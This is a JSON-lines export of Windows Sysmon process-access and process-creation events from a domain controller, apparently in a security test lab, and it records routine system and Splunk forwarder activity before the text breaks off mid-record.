{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2371,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.548\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.548","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2372,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.548\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.548","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2373,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.584\r\nProcessGuid: {41C8662E-1F81-5F25-0000-0010433E0400}\r\nProcessId: 4012\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.584","ProcessGuid":"{41C8662E-1F81-5F25-0000-0010433E0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2374,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.751\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F81-5F25-0000-0010433E0400}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.751","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F81-5F25-0000-0010433E0400}","TargetProcessId":"4012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2375,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.751\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F81-5F25-0000-0010433E0400}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.751","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F81-5F25-0000-0010433E0400}","TargetProcessId":"4012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2376,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2377,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2378,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2379,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 